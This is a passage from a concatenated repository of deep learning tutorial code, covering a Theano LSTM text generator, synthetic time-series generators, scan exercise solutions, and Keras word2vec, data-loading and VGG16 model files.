dtype=config.floatX), 'b_f', borrow=True) self.b_c = theano.shared(numpy.zeros((n_h,), dtype=config.floatX), 'b_c', borrow=True) self.b_o = theano.shared(numpy.zeros((n_h,), dtype=config.floatX), 'b_o', borrow=True) self.params = [self.W_i, self.W_f, self.W_c, self.W_o, self.U_i, self.U_f, self.U_c, self.U_o, self.b_i, self.b_f, self.b_c, self.b_o] outputs_info = [T.zeros((input.shape[1], n_h)), T.zeros((input.shape[1], n_h))] rval, updates = theano.scan(self._step, sequences=[mask, input], outputs_info=outputs_info) # self.output is in the format (batchsize, n_h) self.output = rval[0] def _step(self, m_, x_, h_, c_): i_preact = (index_dot(x_, self.W_i) + T.dot(h_, self.U_i) + self.b_i) i = T.nnet.sigmoid(i_preact) f_preact = (index_dot(x_, self.W_f) + T.dot(h_, self.U_f) + self.b_f) f = T.nnet.sigmoid(f_preact) o_preact = (index_dot(x_, self.W_o) + T.dot(h_, self.U_o) + self.b_o) o = T.nnet.sigmoid(o_preact) c_preact = (index_dot(x_, self.W_c) + T.dot(h_, self.U_c) + self.b_c) c = T.tanh(c_preact) c = f * c_ + i * c c = m_[:, None] * c + (1. - m_)[:, None] * c_ h = o * T.tanh(c) h = m_[:, None] * h + (1. - m_)[:, None] * h_ return h, c def train_model(batch_size=100, n_h=50, n_epochs=40): # Load the datasets with Fuel dictionary = pkl.load(open(DICT_FILE, 'r')) dictionary['~'] = len(dictionary) reverse_mapping = dict((j, i) for i, j in dictionary.items()) print("Loading the data") train = TextFile(files=[TRAIN_FILE], dictionary=dictionary, unk_token='~', level='character', preprocess=str.lower, bos_token=None, eos_token=None) train_stream = DataStream.default_stream(train) # organize data in batches and pad shorter sequences with zeros train_stream = Batch(train_stream, iteration_scheme=ConstantScheme(batch_size)) train_stream = Padding(train_stream) # idem dito for the validation text val = TextFile(files=[VAL_FILE], dictionary=dictionary, unk_token='~', level='character', preprocess=str.lower, bos_token=None, eos_token=None) val_stream = DataStream.default_stream(val) # organize data in batches and pad shorter sequences with zeros val_stream = Batch(val_stream, iteration_scheme=ConstantScheme(batch_size)) val_stream = Padding(val_stream) print('Building model') # Set the random number generator' seeds for consistency rng = numpy.random.RandomState(12345) x = T.lmatrix('x') mask = T.matrix('mask') # Construct the LSTM layer recurrent_layer = LstmLayer(rng=rng, input=x, mask=mask, n_in=111, n_h=n_h) logreg_layer = LogisticRegression(input=recurrent_layer.output[:-1], n_in=n_h, n_out=111) cost = sequence_categorical_crossentropy(logreg_layer.p_y_given_x, x[1:], mask[1:]) / batch_size # create a list of all model parameters to be fit by gradient descent params = logreg_layer.params + recurrent_layer.params # create a list of gradients for all model parameters grads = T.grad(cost, params) # update_model is a function that updates the model parameters by # SGD Since this model has many parameters, it would be tedious to # manually create an update rule for each model parameter. We thus # create the updates list by automatically looping over all # (params[i], grads[i]) pairs. learning_rate = 0.1 updates = [ (param_i, param_i - learning_rate * grad_i) for param_i, grad_i in zip(params, grads) ] update_model = theano.function([x, mask], cost, updates=updates) evaluate_model = theano.function([x, mask], cost) # Define and compile a function for generating a sequence step by step. x_t = T.iscalar() h_p = T.vector() c_p = T.vector() h_t, c_t = recurrent_layer._step(T.ones(1), x_t, h_p, c_p) energy = T.dot(h_t, logreg_layer.W) + logreg_layer.b energy_exp = T.exp(energy - T.max(energy, 1)[:, None]) output = energy_exp / energy_exp.sum(1)[:, None] single_step = theano.function([x_t, h_p, c_p], [output, h_t, c_t]) start_time = time.clock() iteration = 0 for epoch in range(n_epochs): print 'epoch:', epoch for x_, mask_ in train_stream.get_epoch_iterator(): iteration += 1 cross_entropy = update_model(x_.T, mask_.T) # Generate some text after each 20 minibatches if iteration % 40 == 0: try: prediction = numpy.ones(111, dtype=config.floatX) / 111.0 h_p = numpy.zeros((n_h,), dtype=config.floatX) c_p = numpy.zeros((n_h,), dtype=config.floatX) initial = 'the meaning of life is ' sentence = initial for char in initial: x_t = dictionary[char] prediction, h_p, c_p = single_step(x_t, h_p.flatten(), c_p.flatten()) sample = numpy.random.multinomial(1, prediction.flatten()) for i in range(450): x_t = numpy.argmax(sample) prediction, h_p, c_p = single_step(x_t, h_p.flatten(), c_p.flatten()) sentence += reverse_mapping[x_t] sample = numpy.random.multinomial(1, prediction.flatten()) print 'LSTM: "' + sentence + '"' except ValueError: print 'Something went wrong during sentence generation.' if iteration % 40 == 0: print 'epoch:', epoch, ' minibatch:', iteration val_scores = [] for x_val, mask_val in val_stream.get_epoch_iterator(): val_scores.append(evaluate_model(x_val.T, mask_val.T)) print 'Average validation CE per sentence:', numpy.mean(val_scores) end_time = time.clock() print('Optimization complete.') print('The code ran for %.2fm' % ((end_time - start_time) / 60.)) if __name__ == '__main__': train_model() File: deep-learning/theano-tutorial/rnn_tutorial/synthetic.py import collections import numpy as np def mackey_glass(sample_len=1000, tau=17, seed=None, n_samples = 1): ''' mackey_glass(sample_len=1000, tau=17, seed = None, n_samples = 1) -> input Generate the Mackey Glass time-series. Parameters are: - sample_len: length of the time-series in timesteps. Default is 1000. - tau: delay of the MG - system. Commonly used values are tau=17 (mild chaos) and tau=30 (moderate chaos). Default is 17. - seed: to seed the random generator, can be used to generate the same timeseries at each invocation. - n_samples : number of samples to generate ''' delta_t = 10 history_len = tau * delta_t # Initial conditions for the history of the system timeseries = 1.2 if seed is not None: np.random.seed(seed) samples = [] for _ in range(n_samples): history = collections.deque(1.2 * np.ones(history_len) + 0.2 * \ (np.random.rand(history_len) - 0.5)) # Preallocate the array for the time-series inp = np.zeros((sample_len,1)) for timestep in range(sample_len): for _ in range(delta_t): xtau = history.popleft() history.append(timeseries) timeseries = history[-1] + (0.2 * xtau / (1.0 + xtau ** 10) - \ 0.1 * history[-1]) / delta_t inp[timestep] = timeseries # Squash timeseries through tanh inp = np.tanh(inp - 1) samples.append(inp) return samples def mso(sample_len=1000, n_samples = 1): ''' mso(sample_len=1000, n_samples = 1) -> input Generate the Multiple Sinewave Oscillator time-series, a sum of two sines with incommensurable periods. Parameters are: - sample_len: length of the time-series in timesteps - n_samples: number of samples to generate ''' signals = [] for _ in range(n_samples): phase = np.random.rand() x = np.atleast_2d(np.arange(sample_len)).T signals.append(np.sin(0.2 * x + phase) + np.sin(0.311 * x + phase)) return signals def lorentz(sample_len=1000, sigma=10, rho=28, beta=8 / 3, step=0.01): """This function generates a Lorentz time series of length sample_len, with standard parameters sigma, rho and beta. """ x = np.zeros([sample_len]) y = np.zeros([sample_len]) z = np.zeros([sample_len]) # Initial conditions taken from 'Chaos and Time Series Analysis', J. Sprott x[0] = 0; y[0] = -0.01; z[0] = 9; for t in range(sample_len - 1): x[t + 1] = x[t] + sigma * (y[t] - x[t]) * step y[t + 1] = y[t] + (x[t] * (rho - z[t]) - y[t]) * step z[t + 1] = z[t] + (x[t] * y[t] - beta * z[t]) * step x.shape += (1,) y.shape += (1,) z.shape += (1,) return np.concatenate((x, y, z), axis=1) File: deep-learning/theano-tutorial/rnn_tutorial/rnn_precompile.py """This file is only here to speed up the execution of notebooks. It contains a subset of the code defined in simple_rnn.ipynb and lstm_text.ipynb, in particular the code compiling Theano function. Executing this script first will populate the cache of compiled C code, which will make subsequent compilations faster. The use case is to run this script in the background when a demo VM such as the one for NVIDIA's qwikLABS, so that the compilation phase started from the notebooks is faster. """ import numpy import theano import theano.tensor as T from theano import config from theano.tensor.nnet import categorical_crossentropy floatX = theano.config.floatX # simple_rnn.ipynb class SimpleRNN(object): def __init__(self, input_dim, recurrent_dim): w_xh = numpy.random.normal(0, .01, (input_dim, recurrent_dim)) w_hh = numpy.random.normal(0, .02, (recurrent_dim, recurrent_dim)) self.w_xh = theano.shared(numpy.asarray(w_xh, dtype=floatX), name='w_xh') self.w_hh = theano.shared(numpy.asarray(w_hh, dtype=floatX), name='w_hh') self.b_h = theano.shared(numpy.zeros((recurrent_dim,), dtype=floatX), name='b_h') self.parameters = [self.w_xh, self.w_hh, self.b_h] def _step(self, input_t, previous): return T.tanh(T.dot(previous, self.w_hh) + input_t) def __call__(self, x): x_w_xh = T.dot(x, self.w_xh) + self.b_h result, updates = theano.scan(self._step, sequences=[x_w_xh], outputs_info=[T.zeros_like(self.b_h)]) return result w_ho_np = numpy.random.normal(0, .01, (15, 1)) w_ho = theano.shared(numpy.asarray(w_ho_np, dtype=floatX), name='w_ho') b_o = theano.shared(numpy.zeros((1,), dtype=floatX), name='b_o') x = T.matrix('x') my_rnn = SimpleRNN(1, 15) hidden = my_rnn(x) prediction = T.dot(hidden, w_ho) + b_o parameters = my_rnn.parameters + [w_ho, b_o] l2 = sum((p**2).sum() for p in parameters) mse = T.mean((prediction[:-1] - x[1:])**2) cost = mse + .0001 * l2 gradient = T.grad(cost, wrt=parameters) lr = .3 updates = [(par, par - lr * gra) for par, gra in zip(parameters, gradient)] update_model = theano.function([x], cost, updates=updates) get_cost = theano.function([x], mse) predict = theano.function([x], prediction) get_hidden = theano.function([x], hidden) get_gradient = theano.function([x], gradient) predict = theano.function([x], prediction) # Generating sequences x_t = T.vector() h_p = T.vector() preactivation = T.dot(x_t, my_rnn.w_xh) + my_rnn.b_h h_t = my_rnn._step(preactivation, h_p) o_t = T.dot(h_t, w_ho) + b_o single_step = theano.function([x_t, h_p], [o_t, h_t]) # lstm_text.ipynb def gauss_weight(rng, ndim_in, ndim_out=None, sd=.005): if ndim_out is None: ndim_out = ndim_in W = rng.randn(ndim_in, ndim_out) * sd return numpy.asarray(W, dtype=config.floatX) def index_dot(indices, w): return w[indices.flatten()] class LstmLayer: def __init__(self, rng, input, mask, n_in, n_h): # Init params self.W_i = theano.shared(gauss_weight(rng, n_in, n_h), 'W_i', borrow=True) self.W_f = theano.shared(gauss_weight(rng, n_in, n_h), 'W_f', borrow=True) self.W_c = theano.shared(gauss_weight(rng, n_in, n_h), 'W_c', borrow=True) self.W_o = theano.shared(gauss_weight(rng, n_in, n_h), 'W_o', borrow=True) self.U_i = theano.shared(gauss_weight(rng, n_h), 'U_i', borrow=True) self.U_f = theano.shared(gauss_weight(rng, n_h), 'U_f', borrow=True) self.U_c = theano.shared(gauss_weight(rng, n_h), 'U_c', borrow=True) self.U_o = theano.shared(gauss_weight(rng, n_h), 'U_o', borrow=True) self.b_i = theano.shared(numpy.zeros((n_h,), dtype=config.floatX), 'b_i', borrow=True) self.b_f = theano.shared(numpy.zeros((n_h,), dtype=config.floatX), 'b_f', borrow=True) self.b_c = theano.shared(numpy.zeros((n_h,), dtype=config.floatX), 'b_c', borrow=True) self.b_o = theano.shared(numpy.zeros((n_h,), dtype=config.floatX), 'b_o', borrow=True) self.params = [self.W_i, self.W_f, self.W_c, self.W_o, self.U_i, self.U_f, self.U_c, self.U_o, self.b_i, self.b_f, self.b_c, self.b_o] outputs_info = [T.zeros((input.shape[1], n_h)), T.zeros((input.shape[1], n_h))] rval, updates = theano.scan(self._step, sequences=[mask, input], outputs_info=outputs_info) # self.output is in the format (length, batchsize, n_h) self.output = rval[0] def _step(self, m_, x_, h_, c_): i_preact = (index_dot(x_, self.W_i) + T.dot(h_, self.U_i) + self.b_i) i = T.nnet.sigmoid(i_preact) f_preact = (index_dot(x_, self.W_f) + T.dot(h_, self.U_f) + self.b_f) f = T.nnet.sigmoid(f_preact) o_preact = (index_dot(x_, self.W_o) + T.dot(h_, self.U_o) + self.b_o) o = T.nnet.sigmoid(o_preact) c_preact = (index_dot(x_, self.W_c) + T.dot(h_, self.U_c) + self.b_c) c = T.tanh(c_preact) c = f * c_ + i * c c = m_[:, None] * c + (1. - m_)[:, None] * c_ h = o * T.tanh(c) h = m_[:, None] * h + (1. - m_)[:, None] * h_ return h, c def sequence_categorical_crossentropy(prediction, targets, mask): prediction_flat = prediction.reshape(((prediction.shape[0] * prediction.shape[1]), prediction.shape[2]), ndim=2) targets_flat = targets.flatten() mask_flat = mask.flatten() ce = categorical_crossentropy(prediction_flat, targets_flat) return T.sum(ce * mask_flat) class LogisticRegression(object): def __init__(self, rng, input, n_in, n_out): W = gauss_weight(rng, n_in, n_out) self.W = theano.shared(value=numpy.asarray(W, dtype=theano.config.floatX), name='W', borrow=True) # initialize the biases b as a vector of n_out 0s self.b = theano.shared(value=numpy.zeros((n_out,), dtype=theano.config.floatX), name='b', borrow=True) # compute vector of class-membership probabilities in symbolic form energy = T.dot(input, self.W) + self.b energy_exp = T.exp(energy - T.max(energy, axis=2, keepdims=True)) pmf = energy_exp / energy_exp.sum(axis=2, keepdims=True) self.p_y_given_x = pmf self.params = [self.W, self.b] batch_size = 100 n_h = 50 # The Theano graph # Set the random number generator' seeds for consistency rng = numpy.random.RandomState(12345) x = T.lmatrix('x') mask = T.matrix('mask') # Construct an LSTM layer and a logistic regression layer recurrent_layer = LstmLayer(rng=rng, input=x, mask=mask, n_in=111, n_h=n_h) logreg_layer = LogisticRegression(rng=rng, input=recurrent_layer.output[:-1], n_in=n_h, n_out=111) # define a cost variable to optimize cost = sequence_categorical_crossentropy(logreg_layer.p_y_given_x, x[1:], mask[1:]) / batch_size # create a list of all model parameters to be fit by gradient descent params = logreg_layer.params + recurrent_layer.params # create a list of gradients for all model parameters grads = T.grad(cost, params) learning_rate = 0.1 updates = [ (param_i, param_i - learning_rate * grad_i) for param_i, grad_i in zip(params, grads) ] update_model = theano.function([x, mask], cost, updates=updates) evaluate_model = theano.function([x, mask], cost) # Generating Sequences x_t = T.iscalar() h_p = T.vector() c_p = T.vector() h_t, c_t = recurrent_layer._step(T.ones(1), x_t, h_p, c_p) energy = T.dot(h_t, logreg_layer.W) + logreg_layer.b energy_exp = T.exp(energy - T.max(energy, axis=1, keepdims=True)) output = energy_exp / energy_exp.sum(axis=1, keepdims=True) single_step = theano.function([x_t, h_p, c_p], [output, h_t, c_t]) File: deep-learning/theano-tutorial/scan_tutorial/scan_ex1_solution.py import theano import theano.tensor as T import numpy as np coefficients = T.vector("coefficients") x = T.scalar("x") max_coefficients_supported = 10000 def step(coeff, power, prior_value, free_var): return prior_value + (coeff * (free_var ** power)) # Generate the components of the polynomial full_range = T.arange(max_coefficients_supported) outputs_info = np.zeros((), dtype=theano.config.floatX) components, updates = theano.scan(fn=step, sequences=[coefficients, full_range], outputs_info=outputs_info, non_sequences=x) polynomial = components[-1] calculate_polynomial = theano.function(inputs=[coefficients, x], outputs=polynomial, updates=updates) test_coeff = np.asarray([1, 0, 2], dtype=theano.config.floatX) print(calculate_polynomial(test_coeff, 3)) File: deep-learning/theano-tutorial/scan_tutorial/scan_ex2_solution.py import theano import theano.tensor as T import numpy as np probabilities = T.vector() nb_samples = T.iscalar() rng = T.shared_randomstreams.RandomStreams(1234) def sample_from_pvect(pvect): """ Provided utility function: given a symbolic vector of probabilities (which MUST sum to 1), sample one element and return its index. """ onehot_sample = rng.multinomial(n=1, pvals=pvect) sample = onehot_sample.argmax() return sample def set_p_to_zero(pvect, i): """ Provided utility function: given a symbolic vector of probabilities and an index 'i', set the probability of the i-th element to 0 and renormalize the probabilities so they sum to 1. """ new_pvect = T.set_subtensor(pvect[i], 0.) new_pvect = new_pvect / new_pvect.sum() return new_pvect def step(p): sample = sample_from_pvect(p) new_p = set_p_to_zero(p, sample) return new_p, sample output, updates = theano.scan(fn=step, outputs_info=[probabilities, None], n_steps=nb_samples) modified_probabilities, samples = output f = theano.function(inputs=[probabilities, nb_samples], outputs=[samples], updates=updates) # Testing the function test_probs = np.asarray([0.6, 0.3, 0.1], dtype=theano.config.floatX) for i in range(10): print(f(test_probs, 2)) File: deep-learning/theano-tutorial/intro_theano/utils.py """ This file contains different utility functions that are not connected in anyway to the networks presented in the tutorials, but rather help in processing the outputs into a more understandable way. For example ``tile_raster_images`` helps in generating a easy to grasp image from a set of samples or weights. """ import numpy from six.moves import xrange def scale_to_unit_interval(ndar, eps=1e-8): """ Scales all values in the ndarray ndar to be between 0 and 1 """ ndar = ndar.copy() ndar -= ndar.min() ndar *= 1.0 / (ndar.max() + eps) return ndar def tile_raster_images(X, img_shape, tile_shape, tile_spacing=(0, 0), scale_rows_to_unit_interval=True, output_pixel_vals=True): """ Transform an array with one flattened image per row, into an array in which images are reshaped and layed out like tiles on a floor. This function is useful for visualizing datasets whose rows are images, and also columns of matrices for transforming those rows (such as the first layer of a neural net). :type X: a 2-D ndarray or a tuple of 4 channels, elements of which can be 2-D ndarrays or None; :param X: a 2-D array in which every row is a flattened image. :type img_shape: tuple; (height, width) :param img_shape: the original shape of each image :type tile_shape: tuple; (rows, cols) :param tile_shape: the number of images to tile (rows, cols) :param output_pixel_vals: if output should be pixel values (i.e. int8 values) or floats :param scale_rows_to_unit_interval: if the values need to be scaled before being plotted to [0,1] or not :returns: array suitable for viewing as an image. (See:`Image.fromarray`.) :rtype: a 2-d array with same dtype as X. """ assert len(img_shape) == 2 assert len(tile_shape) == 2 assert len(tile_spacing) == 2 # The expression below can be re-written in a more C style as # follows : # # out_shape = [0,0] # out_shape[0] = (img_shape[0]+tile_spacing[0])*tile_shape[0] - # tile_spacing[0] # out_shape[1] = (img_shape[1]+tile_spacing[1])*tile_shape[1] - # tile_spacing[1] out_shape = [ (ishp + tsp) * tshp - tsp for ishp, tshp, tsp in zip(img_shape, tile_shape, tile_spacing) ] if isinstance(X, tuple): assert len(X) == 4 # Create an output numpy ndarray to store the image if output_pixel_vals: out_array = numpy.zeros((out_shape[0], out_shape[1], 4), dtype='uint8') else: out_array = numpy.zeros((out_shape[0], out_shape[1], 4), dtype=X.dtype) #colors default to 0, alpha defaults to 1 (opaque) if output_pixel_vals: channel_defaults = [0, 0, 0, 255] else: channel_defaults = [0., 0., 0., 1.] for i in xrange(4): if X[i] is None: # if channel is None, fill it with zeros of the correct # dtype dt = out_array.dtype if output_pixel_vals: dt = 'uint8' out_array[:, :, i] = numpy.zeros( out_shape, dtype=dt ) + channel_defaults[i] else: # use a recurrent call to compute the channel and store it # in the output out_array[:, :, i] = tile_raster_images( X[i], img_shape, tile_shape, tile_spacing, scale_rows_to_unit_interval, output_pixel_vals) return out_array else: # if we are dealing with only one channel H, W = img_shape Hs, Ws = tile_spacing # generate a matrix to store the output dt = X.dtype if output_pixel_vals: dt = 'uint8' out_array = numpy.zeros(out_shape, dtype=dt) for tile_row in xrange(tile_shape[0]): for tile_col in xrange(tile_shape[1]): if tile_row * tile_shape[1] + tile_col < X.shape[0]: this_x = X[tile_row * tile_shape[1] + tile_col] if scale_rows_to_unit_interval: # if we should scale values to be between 0 and 1 # do this by calling the `scale_to_unit_interval` # function this_img = scale_to_unit_interval( this_x.reshape(img_shape)) else: this_img = this_x.reshape(img_shape) # add the slice to the corresponding position in the # output array c = 1 if output_pixel_vals: c = 255 out_array[ tile_row * (H + Hs): tile_row * (H + Hs) + H, tile_col * (W + Ws): tile_col * (W + Ws) + W ] = this_img * c return out_array File: deep-learning/keras-tutorial/w2v.py from gensim.models import word2vec from os.path import join, exists, split import os import numpy as np def train_word2vec(sentence_matrix, vocabulary_inv, num_features=300, min_word_count=1, context=10): """ Trains, saves, loads Word2Vec model Returns initial weights for embedding layer. inputs: sentence_matrix # int matrix: num_sentences x max_sentence_len vocabulary_inv # dict {str:int} num_features # Word vector dimensionality min_word_count # Minimum word count context # Context window size """ model_dir = 'word2vec_models' model_name = "{:d}features_{:d}minwords_{:d}context".format(num_features, min_word_count, context) model_name = join(model_dir, model_name) if exists(model_name): embedding_model = word2vec.Word2Vec.load(model_name) print('Loading existing Word2Vec model \'%s\'' % split(model_name)[-1]) else: # Set values for various parameters num_workers = 2 # Number of threads to run in parallel downsampling = 1e-3 # Downsample setting for frequent words # Initialize and train the model print("Training Word2Vec model...") sentences = [[vocabulary_inv[w] for w in s] for s in sentence_matrix] embedding_model = word2vec.Word2Vec(sentences, workers=num_workers, \ size=num_features, min_count = min_word_count, \ window = context, sample = downsampling) # If we don't plan to train the model any further, calling # init_sims will make the model much more memory-efficient. embedding_model.init_sims(replace=True) # Saving the model for later use. You can load it later using Word2Vec.load() if not exists(model_dir): os.mkdir(model_dir) print('Saving Word2Vec model \'%s\'' % split(model_name)[-1]) embedding_model.save(model_name) # add unknown words embedding_weights = [np.array([embedding_model[w] if w in embedding_model\ else np.random.uniform(-0.25,0.25,embedding_model.vector_size)\ for w in vocabulary_inv])] return embedding_weights if __name__=='__main__': import data_helpers print("Loading data...") x, _, _, vocabulary_inv = data_helpers.load_data() w = train_word2vec(x, vocabulary_inv) File: deep-learning/keras-tutorial/data_helpers.py import numpy as np import re import itertools from collections import Counter """ Original taken from https://github.com/dennybritz/cnn-text-classification-tf """ def clean_str(string): """ Tokenization/string cleaning for all datasets except for SST. Original taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data.py """ string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string) string = re.sub(r"\'s", " \'s", string) string = re.sub(r"\'ve", " \'ve", string) string = re.sub(r"n\'t", " n\'t", string) string = re.sub(r"\'re", " \'re", string) string = re.sub(r"\'d", " \'d", string) string = re.sub(r"\'ll", " \'ll", string) string = re.sub(r",", " , ", string) string = re.sub(r"!", " ! ", string) string = re.sub(r"\(", " \( ", string) string = re.sub(r"\)", " \) ", string) string = re.sub(r"\?", " \? ", string) string = re.sub(r"\s{2,}", " ", string) return string.strip().lower() def load_data_and_labels(): """ Loads MR polarity data from files, splits the data into words and generates labels. Returns split sentences and labels. """ # Load data from files positive_examples = list(open("./data/rt-polarity.pos", encoding='ISO-8859-1').readlines()) positive_examples = [s.strip() for s in positive_examples] negative_examples = list(open("./data/rt-polarity.neg", encoding='ISO-8859-1').readlines()) negative_examples = [s.strip() for s in negative_examples] # Split by words x_text = positive_examples + negative_examples x_text = [clean_str(sent) for sent in x_text] x_text = [s.split(" ") for s in x_text] # Generate labels positive_labels = [[0, 1] for _ in positive_examples] negative_labels = [[1, 0] for _ in negative_examples] y = np.concatenate([positive_labels, negative_labels], 0) return [x_text, y] def pad_sentences(sentences, padding_word="<PAD/>"): """ Pads all sentences to the same length. The length is defined by the longest sentence. Returns padded sentences. """ sequence_length = max(len(x) for x in sentences) padded_sentences = [] for i in range(len(sentences)): sentence = sentences[i] num_padding = sequence_length - len(sentence) new_sentence = sentence + [padding_word] * num_padding padded_sentences.append(new_sentence) return padded_sentences def build_vocab(sentences): """ Builds a vocabulary mapping from word to index based on the sentences. Returns vocabulary mapping and inverse vocabulary mapping. """ # Build vocabulary word_counts = Counter(itertools.chain(*sentences)) # Mapping from index to word vocabulary_inv = [x[0] for x in word_counts.most_common()] # Mapping from word to index vocabulary = {x: i for i, x in enumerate(vocabulary_inv)} return [vocabulary, vocabulary_inv] def build_input_data(sentences, labels, vocabulary): """ Maps sentencs and labels to vectors based on a vocabulary. """ x = np.array([[vocabulary[word] for word in sentence] for sentence in sentences]) y = np.array(labels) return [x, y] def load_data(): """ Loads and preprocessed data for the MR dataset. Returns input vectors, labels, vocabulary, and inverse vocabulary. """ # Load and preprocess data sentences, labels = load_data_and_labels() sentences_padded = pad_sentences(sentences) vocabulary, vocabulary_inv = build_vocab(sentences_padded) x, y = build_input_data(sentences_padded, labels, vocabulary) return [x, y, vocabulary, vocabulary_inv] def batch_iter(data, batch_size, num_epochs): """ Generates a batch iterator for a dataset. """ data = np.array(data) data_size = len(data) num_batches_per_epoch = int(len(data)/batch_size) + 1 for epoch in range(num_epochs): # Shuffle the data at each epoch shuffle_indices = np.random.permutation(np.arange(data_size)) shuffled_data = data[shuffle_indices] for batch_num in range(num_batches_per_epoch): start_index = batch_num * batch_size end_index = min((batch_num + 1) * batch_size, data_size) yield shuffled_data[start_index:end_index] File: deep-learning/keras-tutorial/deep_learning_models/imagenet_utils.py import numpy as np import json from keras.utils.data_utils import get_file from keras import backend as K CLASS_INDEX = None CLASS_INDEX_PATH = 'https://s3.amazonaws.com/deep-learning-models/image-models/imagenet_class_index.json' def preprocess_input(x, dim_ordering='default'): if dim_ordering == 'default': dim_ordering = K.image_dim_ordering() assert dim_ordering in {'tf', 'th'} if dim_ordering == 'th': x[:, 0, :, :] -= 103.939 x[:, 1, :, :] -= 116.779 x[:, 2, :, :] -= 123.68 # 'RGB'->'BGR' x = x[:, ::-1, :, :] else: x[:, :, :, 0] -= 103.939 x[:, :, :, 1] -= 116.779 x[:, :, :, 2] -= 123.68 # 'RGB'->'BGR' x = x[:, :, :, ::-1] return x def decode_predictions(preds): global CLASS_INDEX assert len(preds.shape) == 2 and preds.shape[1] == 1000 if CLASS_INDEX is None: fpath = get_file('imagenet_class_index.json', CLASS_INDEX_PATH, cache_subdir='models') CLASS_INDEX = json.load(open(fpath)) indices = np.argmax(preds, axis=-1) results = [] for i in indices: results.append(CLASS_INDEX[str(i)]) return results File: deep-learning/keras-tutorial/deep_learning_models/vgg16.py # -*- coding: utf-8 -*- '''VGG16 model for Keras. # Reference: - [Very Deep Convolutional Networks for Large-Scale Image Recognition](https://arxiv.org/abs/1409.1556) ''' from __future__ import print_function import numpy as np import warnings from keras.models import Model from keras.layers import Flatten, Dense, Input from keras.layers import Convolution2D, MaxPooling2D from keras.preprocessing import image from keras.utils.layer_utils import convert_all_kernels_in_model from keras.utils.data_utils import get_file from keras import backend as K # from imagenet_utils import decode_predictions, preprocess_input TH_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_th_dim_ordering_th_kernels.h5' TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels.h5' TH_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_th_dim_ordering_th_kernels_notop.h5' TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5' def VGG16(include_top=True, weights='imagenet', input_tensor=None): '''Instantiate the VGG16 architecture, optionally loading weights pre-trained on ImageNet. Note that when using TensorFlow, for best performance you should set `image_dim_ordering="tf"` in your Keras config at ~/.keras/keras.json. The model and the weights are compatible with both TensorFlow and Theano. The dimension ordering convention used by the model is the one specified in your Keras config file. # Arguments include_top: whether to include the 3 fully-connected layers at the top of the network. weights: one of `None` (random initialization) or "imagenet" (pre-training on ImageNet). input_tensor: optional Keras tensor (i.e. output of `layers.Input()`) to use as image input for the model. # Returns A Keras model instance. ''' if weights not in {'imagenet', None}: raise ValueError('The `weights` argument should be either ' '`None` (random initialization) or `imagenet` ' '(pre-training on ImageNet).') # Determine proper input shape if K.image_dim_ordering() == 'th': if include_top: input_shape = (3, 224, 224) else: input_shape = (3, None, None) else: if include_top: input_shape = (224, 224, 3) else: input_shape = (None, None, 3) if input_tensor is None: img_input = Input(shape=input_shape) else: if not K.is_keras_tensor(input_tensor): img_input = Input(tensor=input_tensor) else: img_input = input_tensor # Block 1 x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv1')(img_input) x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x) # Block 2 x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv1')(x) x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x) # Block 3 x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv1')(x) x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv2')(x) x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv3')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x) # Block 4 x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv1')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv2')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv3')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x) # Block 5 x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv1')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv2')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv3')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x) if include_top: # Classification block x = Flatten(name='flatten')(x) x = Dense(4096, activation='relu', name='fc1')(x) x = Dense(4096, activation='relu', name='fc2')(x) x = Dense(1000, activation='softmax', name='predictions')(x) # Create model model = Model(img_input, x) # load weights if weights == 'imagenet': print('K.image_dim_ordering:', K.image_dim_ordering()) if K.image_dim_ordering() == 'th': if include_top: weights_path = get_file('vgg16_weights_th_dim_ordering_th_kernels.h5', TH_WEIGHTS_PATH, cache_subdir='models') else: weights_path = get_file('vgg16_weights_th_dim_ordering_th_kernels_notop.h5', TH_WEIGHTS_PATH_NO_TOP, cache_subdir='models') model.load_weights(weights_path) if K.backend() == 'tensorflow': warnings.warn('You are using the TensorFlow backend, yet you ' 'are using the Theano ' 'image dimension ordering convention ' '(`image_dim_ordering="th"`). ' 'For best performance, set ' '`image_dim_ordering="tf"` in ' 'your Keras config ' 'at ~/.keras/keras.json.') convert_all_kernels_in_model(model) else: if include_top: weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels.h5', TF_WEIGHTS_PATH, cache_subdir='models') else: weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5', TF_WEIGHTS_PATH_NO_TOP, cache_subdir='models') model.load_weights(weights_path) if K.backend() == 'theano': convert_all_kernels_in_model(model) return model if __name__ == '__main__': model = VGG16(include_top=True, weights='imagenet') img_path = 'elephant.jpg' img = image.load_img(img_path, target_size=(224, 224)) x = image.img_to_array(img) x = np.expand_dims(x, axis=0) x = 